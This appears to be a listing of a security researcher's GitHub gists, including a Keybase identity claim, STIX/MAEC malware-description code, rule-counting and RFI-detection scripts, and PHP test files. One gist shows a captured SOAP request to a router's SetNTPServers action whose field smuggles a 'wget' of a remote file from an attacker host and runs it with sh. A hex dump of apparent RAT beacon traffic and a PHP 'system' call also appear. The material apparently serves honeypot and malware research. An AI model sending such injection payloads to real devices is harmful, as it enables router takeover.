I hereby claim:
- I am glaslos on github.
- I am glaslos (https://keybase.io/glaslos) on keybase.
- I have a public key whose fingerprint is D099 0BD3 2653 363D 4EB0 4DA3 63D2 3785 3EDE 7A61
To claim this, I am signing this object:
.. |landscape| image:: https://landscape.io/github/glastopf/conpot/master/landscape.png | |
:target: https://landscape.io/github/glastopf/conpot/master | |
:alt: Code Health |
from lxml import etree | |
from maec.package.package import Package | |
from stix.extensions.malware.maec_4_1_malware import MAECInstance | |
malware_package = Package() | |
maec_malware_instance = MAECInstance() | |
maec_malware_instance.maec = etree.fromstring( | |
malware_package.to_xml(), parser=etree.ETCompatXMLParser() | |
) |
I hereby claim:
To claim this, I am signing this object:
import requests | |
rule_count = 0 | |
http_rule_count = 0 | |
r = requests.get("http://rules.emergingthreats.net/open-nogpl/snort-edge/rules/emerging-trojan.rules") | |
for line in r.text.split("\n"): | |
if line.strip() == "#": | |
rule_count += 1 | |
elif "$HTTP_PORTS" in line: |
import SimpleHTTPServer | |
import SocketServer | |
paths = set() | |
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
def do_GET(self): | |
# Detect remote file inclusion | |
if '=http' in self.path: |
import sys | |
import tty | |
import termios | |
fd = sys.stdin.fileno() | |
# keep original terminal settings | |
old_settings = termios.tcgetattr(fd) | |
<?php | |
system("uname -a"); | |
?> |
<?php echo("test successful"); ?> |
<?xml version="1.0"?> | |
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> | |
<SOAP-ENV:Body> | |
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> | |
<NewNTPServer1>`cd /var/tmp;cd /tmp;wget http://glzfk.pw:8080/a;sh a`</NewNTPServer1> | |
<NewNTPServer2/> | |
<NewNTPServer3/> | |
<NewNTPServer4/> | |
<NewNTPServer5/> | |
</u:SetNTPServers> |
00000000 6c 76 7c 27 7c 27 7c 56 48 4a 76 61 6d 46 75 58 |lv|'|'|VHJvamFuX| | |
00000010 30 4d 30 4e 6b 59 32 52 54 6b 3d 7c 27 7c 27 7c |0M0NkY2RTk=|'|'|| | |
00000020 4d 41 52 4b 7c 27 7c 27 7c 75 73 65 72 7c 27 7c |MARK|'|'|user|'|| | |
00000030 27 7c 32 30 31 33 2d 31 31 2d 32 32 7c 27 7c 27 |'|2013-11-22|'|'| | |
00000040 7c 7c 27 7c 27 7c 57 69 6e 20 58 50 7c 27 7c 27 |||'|'|Win XP|'|'| | |
00000050 7c 4e 6f 7c 27 7c 27 7c 30 2e 36 2e 34 7c 27 7c ||No|'|'|0.6.4|'|| | |
00000060 27 7c 2e 2e 7c 27 7c 27 7c 7c 27 7c 27 7c 5b 65 |'|..|'|'||'|'|[e| | |
00000070 6e 64 6f 66 5d |ndof]| | |
>>> base64.b64decode("VHJvamFuX0M0NkY2RTk=") |